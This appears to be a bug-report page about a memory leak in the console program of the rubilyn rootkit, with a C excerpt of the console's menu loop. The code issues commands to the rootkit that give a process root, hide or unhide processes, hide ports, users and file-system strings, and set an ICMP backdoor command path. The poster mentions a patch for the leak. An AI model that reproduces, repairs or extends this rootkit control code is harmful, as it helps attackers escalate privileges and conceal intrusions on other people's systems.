tools
tools copied to clipboard
Published
20 hours ago •
nullsecuritynet
nullsecuritynet
Bug:Allocation with read_arg, strcat doesn't release it.
backdoor/rubilyn/source/rubilyncon.c:
55
56 char* read_arg(){
57 char* string;
58 string = malloc(MAXARG);
59 if(!string)
60 exit(0);
61 memset(string,0,MAXARG);
62 scanf("%512s",string);
63 return string;
64 }
65
66 void main_menu(){
67 char str;
68 char arg[MAXLEN];
69 do{
70 memset(arg,0,MAXLEN);
71 memcpy(arg,"debug.rubilyn.",strlen("debug.rubilyn."));
72 printf("--> ");
73 str = getchar();
74 switch(str){
75 case '1':
76 printf("enter process id to give root: ");
77 strcat(arg,"pid=");
78 strcat(arg,read_arg());
79 execute(arg);
80 break;
81 case '2':
82 printf("enter process id to hide: ");
83 strcat(arg,"pid2=");
84 strcat(arg,read_arg());
85 execute(arg);
86 printf("warning!! do not kill a hidden process or face the wrath of mach_task!\n");
87 break;
88 case '3':
89 printf("enter process id to unhide: ");
90 strcat(arg,"pid3=");
91 strcat(arg,read_arg());
92 execute(arg);
93 break;
94 case '4':
95 printf("enter network port to hide: ");
96 strcat(arg,"port=");
97 strcat(arg,read_arg());
98 execute(arg);
99 break;
100 case '5':
101 printf("enter username to hide: ");
102 strcat(arg,"user=");
103 strcat(arg,read_arg());
104 execute(arg);
105 break;
106 case '6':
107 printf("enter string to hide on file system: ");
108 strcat(arg,"dir=");
109 strcat(arg,read_arg());
110 execute(arg);
111 break;
112 case '7':
113 printf("enter icmp path for backdoor: ");
114 strcat(arg,"cmd=");
115 strcat(arg,read_arg());
116 execute(arg);
117 break;
118 case '8':
119 printf("not ready yet\n");
120 break;
121 case '9':
122 printf("not ready yet");
123 break;
124 case 'h':
125 print_menu();
126 break;
127 case '?':
128 print_menu();
129 break;
130 case 'q':
131 exit(0);
132 break;
133 case 'x':
134 exit(0);
135 break;
136 default:
137 printf("Invalid selection\n");
138 break;
139 }
140 }
141 while(getchar() != '\n');
142 }
allocation with read_arg, strcat doesn't release it
And I fixed the bug by th patch: fix-allocation-with-read_arg-strcat-doesnt-release-it.txt
